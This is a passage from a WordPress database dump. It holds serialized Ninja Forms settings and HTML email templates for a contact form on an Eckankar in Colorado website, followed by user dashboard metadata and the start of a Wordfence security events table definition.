dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:32:\"Administrative Services Director\";s:5:\"value\";s:32:\"Administrative Services Director\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:22:\"ECK Center Coordinator\";s:5:\"value\";s:22:\"ECK Center Coordinator\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:27:\"Spiritual Services Director\";s:5:\"value\";s:27:\"Spiritual Services Director\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:5;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Vahana Leader\";s:5:\"value\";s:13:\"Vahana Leader\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}s:3:\"key\";s:13:\"listselect_40\";s:15:\"container_class\";s:0:\"\";s:11:\"field_label\";s:41:\"Select the person you would like to email\";s:9:\"field_key\";s:13:\"listselect_40\";s:14:\"drawerDisabled\";b:0;}}i:129;a:1:{s:8:\"settings\";a:33:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:10;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:8:\"textarea\";s:5:\"label\";s:23:\"Enter Your Message Here\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:13:\"default_value\";s:0:\"\";s:12:\"textarea_rte\";s:1:\"0\";s:14:\"textarea_media\";s:1:\"0\";s:18:\"disable_rte_mobile\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:17:\"calc_auto_include\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:7:\"default\";s:0:\"\";s:3:\"key\";s:11:\"textarea_41\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:10:\"manual_key\";s:0:\"\";s:11:\"field_label\";s:23:\"Enter Your Message Here\";s:9:\"field_key\";s:11:\"textarea_41\";s:5:\"value\";s:0:\"\";}}i:641;a:1:{s:8:\"settings\";a:12:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:11;s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:4:\"HTML\";s:4:\"type\";s:4:\"html\";s:7:\"default\";s:197:\"This site is protected by reCAPTCHA and the Google    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:18:\"html_1663801397261\";s:14:\"drawerDisabled\";b:0;}}i:131;a:1:{s:8:\"settings\";a:19:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:12;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:6:\"submit\";s:5:\"label\";s:6:\"Submit\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:16:\"processing_label\";s:10:\"Processing\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:9:\"submit_43\";s:15:\"container_class\";s:0:\"\";s:11:\"field_label\";s:6:\"Submit\";s:9:\"field_key\";s:9:\"submit_43\";}}i:642;a:1:{s:8:\"settings\";a:11:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:13;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:4:\"html\";s:5:\"label\";s:4:\"HTML\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:18:\"html_1663801395614\";}}}s:7:\"actions\";a:4:{i:45;a:1:{s:8:\"settings\";a:32:{s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:4:\"save\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:42:54\";s:5:\"label\";s:9:\"Save Form\";s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:8:\"reply_to\";s:0:\"\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:19:\"email_message_plain\";s:0:\"\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:11:\"success_msg\";s:42:\"Your form has been successfully submitted.\";}}i:46;a:1:{s:8:\"settings\";a:29:{s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:42:53\";s:5:\"label\";s:17:\"Send copy to user\";s:12:\"date_updated\";s:10:\"2016-01-15\";s:9:\"from_name\";s:20:\"Eckankar In Colorado\";s:12:\"from_address\";s:31:\"webmaster@eckankar-colorado.org\";s:2:\"to\";s:16:\"{field:email_35}\";s:13:\"email_subject\";s:42:\"Colorado Springs Leadership Communications\";s:13:\"email_message\";s:3691:\"<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello {field:textbox_33},</strong></p><br /><br />\r\n<p>Thanks for getting in touch! You have created a new form submission on the Eckankar In Colorado website requesting contact with a person on the Colorado Springs Leadership Communications team.</p><br /><br />\r\n<p>Here is a copy of the information that you have submitted:</p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_33}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_34}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_35}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_36}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_37}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:listselect_40}</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_41}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p>Your submission is being forwarded to the person that you have selected and you will be contacted soon.</p><br /><br />\r\n<p>If you have any questions regarding the origin of this form, please feel free to contact the<br /><br /><br />\r\n Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org</p><br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:0:\"\";s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";}}i:47;a:1:{s:8:\"settings\";a:35:{s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:14:\"successmessage\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:42:53\";s:5:\"label\";s:15:\"Success Message\";s:12:\"date_updated\";s:10:\"2016-01-15\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:361:\"<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us. You will be contacted soon regarding your submission.</span></p>\n</div>\";s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:14:\"drawerDisabled\";s:0:\"\";}}i:48;a:1:{s:8:\"settings\";a:30:{s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:42:54\";s:5:\"label\";s:11:\"Admin Email\";s:12:\"date_updated\";s:10:\"2016-01-19\";s:9:\"from_name\";s:42:\"Colorado Springs Leadership Communications\";s:12:\"from_address\";s:31:\"webmaster@eckankar-colorado.org\";s:2:\"to\";s:31:\"webmaster@eckankar-colorado.org\";s:13:\"email_subject\";s:43:\"ECK Colorado Website - Form Record Received\";s:13:\"email_message\";s:3858:\"<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello!</strong><strong> You have a new <span style=\"color: #23507d\">Colorado Springs Leadership Communications</span> form submission.<br /><br /><br />\r\n </strong><br /><br /><br />\r\n This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this submission because you are listed as a contact for the <em>Colorado Springs ECK organization</em>.<br /><br /><br />\r\n <strong><br /><br /><br />\r\n The following person has requested contact with an ECK representative. Here is the information that <span style=\"color: #666666\">{field:textbox_33}Â {field:lastname_34}</span> has submitted:</strong></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_33}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_34}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_35}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_36}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_37}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:listselect_40}</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_41}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:0:\"\";s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:14:\"drawerDisabled\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";}}}}'),(3702,5,'roc_dismissed_pro_release_notice','1'),(3703,5,'boldgrid_dismissed_admin_notices','a:2:{s:2:\"id\";s:23:\"boldgrid_backup_renamed\";s:9:\"timestamp\";i:1694807001;}'),(3704,5,'advanced_google_recaptcha_wpan_dismissed','1'),(3705,5,'meta-box-order_dashboard','a:4:{s:6:\"normal\";s:151:\"dashboard_rediscache,boldgrid-notifications,aj_dashboard_widget,dashboard_right_now,dashboard_activity,fluentform_stat_widget,mec_widget_total_bookings\";s:4:\"side\";s:82:\"boldgrid_news_widget,dashboard_quick_press,dashboard_primary,dashboard_site_health\";s:7:\"column3\";s:24:\"mec_widget_news_features\";s:7:\"column4\";s:32:\"wordfence_activity_report_widget\";}'),(3706,5,'closedpostboxes_dashboard','a:0:{}'),(3707,5,'metaboxhidden_dashboard','a:5:{i:0;s:18:\"dashboard_activity\";i:1;s:25:\"mec_widget_total_bookings\";i:2;s:20:\"boldgrid_news_widget\";i:3;s:21:\"dashboard_quick_press\";i:4;s:17:\"dashboard_primary\";}');
/*!40000 ALTER TABLE `wpcl_usermeta` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_usermeta` with 212 row(s)
--

--
-- Table structure for table `wpcl_wfsecurityevents`
--

DROP TABLE IF EXISTS `wpcl_wfsecurityevents`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_wfsecurityevents` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `type` varchar(255) NOT NULL DEFAULT '',
  `data` text NOT NULL,
  `event_time` double(14,4) NOT NULL,
  `state` enum('new','sending','sent') NOT NULL DEFAULT 'new',
  `state_timestamp` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp(),
